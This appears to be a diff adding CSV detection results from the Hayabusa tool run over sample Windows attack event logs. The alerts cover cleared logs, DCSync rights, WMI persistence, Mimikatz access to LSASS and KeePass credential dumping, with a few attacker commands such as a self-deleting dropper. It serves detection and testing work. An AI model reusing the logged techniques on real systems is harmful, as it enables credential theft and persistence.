+2019-03-20 08:20:19.155 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Windows\system32\osk.exe""   :  Path: C:\Windows\System32\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.205 +09:00,PC01.example.corp,1,informational,Process Creation,Command: utilman.exe /debug  :  Path: C:\Windows\System32\Utilman.exe  :  User: EXAMPLE\user01  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:20:19.295 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""c:\osk.exe""   :  Path: C:\osk.exe  :  User: EXAMPLE\user01  :  Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:01.325 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""C:\Program Files\Windows Media Player\wmpnetwk.exe""  :  Path: C:\Program Files\Windows Media Player\wmpnetwk.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:21:48.323 +09:00,PC01.example.corp,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:23:41.105 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224  :  Path: C:\Windows\System32\UI0Detect.exe  :  User: EXAMPLE\user01  :  Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx
+2019-03-20 08:34:25.894 +09:00,PC01.example.corp,104,high,System log file was cleared,User: user01,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_104_system_log_cleared.evtx
+2019-03-20 08:35:07.524 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx
+2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx
+2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx
+2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe""   :  Path: C:\Users\user01\Desktop\WMIGhost.exe  :  User: PC04\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding  :  Path: C:\Windows\System32\wbem\scrcons.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe  :  Path: C:\Windows\Sysmon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding  :  Path: C:\Windows\System32\wbem\unsecapp.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon  -c sysmonconfig-18-apr-2019.xml  :  Path: C:\Users\IEUser\Desktop\Sysmon.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell  :  Command: Powershell  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: ""C:\Windows\system32\whoami.exe""  /user  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control  :  Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc""   :  Path: C:\Windows\System32\mmc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery  :  Command: ""C:\Windows\system32\whoami.exe""  /user  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: ""C:\Users\IEUser\Downloads\Flash_update.exe""   :  Path: C:\Users\IEUser\Downloads\Flash_update.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe""   :  Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: cmd.exe /A  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface  :  Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe""   :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading  :  Command: KeeFarce.exe  :  Path: C:\Users\Public\KeeFarce.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
+2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
+2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
+2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
+2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile  :  Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe""  /all  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding  :  Path: C:\Windows\System32\slui.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
+2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
+2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
